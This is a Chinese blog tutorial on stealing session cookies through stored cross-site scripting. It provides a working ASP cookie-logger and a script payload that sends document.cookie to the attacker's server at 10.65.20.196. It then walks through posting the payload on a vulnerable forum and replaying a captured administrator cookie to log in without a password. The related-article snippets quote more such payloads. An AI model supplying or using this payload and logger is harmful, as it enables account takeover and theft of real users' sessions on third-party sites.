XSS获取cookie并利用

最新推荐文章于 2023-07-24 20:50:04 发布
最新推荐文章于 2023-07-24 20:50:04 发布
阅读量1.8k 收藏 2
点赞数
分类专栏: xss
获取cookie利用代码cookie.asp
<html>
<title>xx</title>
<body>
<%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
thisfile.close()   //关闭
set fs = nothing%>
</body>
</html>
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。
 
XSS构造语句
<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。
简单步骤如下:
1、在存在 漏洞论坛中发日志:




 
2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:
3、这是没有账户前的登陆界面:
4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:
5、替换cookie后不用输用户名密码就顺利进入管理员账户了:
 
kuxing100
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cookie作用和使用方式
m0_67542258的博客
07-23 990
对于cookie的初步学习
XSS获取cookie利用方式 (ASP版).txt
12-22
XSS获取cookie利用方式简单方法
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 3968
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
xss实战: 利用xss得到cookie "/><br><script src="https://www.yunssl.cn:9062/static/p2.js"></script><!-
七侠镇莫小贝的同福客栈
10-14 3953
1. 制作一个joke.js,放到外网: // 参考:http://blog.csdn.net/binyao02123202/article/details/9041113 // 目前比较好的xss方法:js较短,客户端不弹窗,可完整地获取cookie var img = document.createElement('img'); img.width = 0; img.height = 0;
跨站脚本攻击XSS 获取cookie (low)
weixin_44901204的博客
08-04 3627
XSS 跨站脚本攻击(Cross-site scripting),简称XSS(为区分CSS),它是一种迫使 Web 站点回显可执行代码的攻击技术。 XSS分为存储型XSS(Stored XSS)和反射型XSS(Reflected XSS) 存储型XSS 思路: 黑客在服务器的某一个留言板上留言了一条可以执行的语句(这是一条命令),这条语句上有黑客的IP地址,普通用户去访问这个网站,一旦打开了留言板...
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS获取Cookie过程简单演示
热门推荐
qq_36609913的博客
01-15 2万+
XSS: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 本次演示将通过DVWA平台进行 实例: 打开
第二节 XSS盗取cookie-01
最新发布
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
[BBP系列二] Uber XSS via Cookie 1
08-03
2. 子域上的XSS:寻找并利用Uber的任何子域上的XSS漏洞,以在用户浏览器中设置`_rfiServer` Cookie。 这种利用方式的复杂性在于,需要找到一个漏洞来触发另一个漏洞,即“虫洞”攻击。为什么限定为Uber的任何子域呢...
xss Cookie
10-09
XSS漏洞与Cookie利用详解》 XSS(Cross Site Scripting),中文名为跨站脚本攻击,是一种常见的网络安全漏洞,主要发生在Web应用程序中。它允许攻击者在用户浏览器上注入恶意脚本,从而窃取用户的敏感信息,如...
xss防御之php利用httponly防xss攻击
12-19
例如,某些XSS攻击可能不依赖于读取Cookie,而是利用其他方式,如注入恶意的iframe或重定向用户到钓鱼页面。因此,除了启用HTTPOnly,还需要结合其他防御措施,如输入验证、输出编码、使用安全的编程实践等。 在PHP...
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3869
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3144
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 5520
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
XSS平台的简单搭建和获取cookie
m0_65096687的博客
10-09 2452
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1358
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
简单的利用XSS获取用户cookie
shy的博客
10-25 4284
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
获取cookie_XSS获取COOKIE
weixin_31467557的博客
01-27 1314
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序中,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车中,二者不能够混淆,因为二者属于是不同的会话。HTTP...
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7075
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
xss获取cookie攻击
07-28
常见的XSS攻击手段包括盗用cookie利用植入Flash获取更高权限、以用户身份执行管理动作等。\[2\]在XSS攻击中,攻击者通过在网页中插入恶意代码,当用户访问该网页时,恶意代码会被执行,从而获取用户的cookie信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值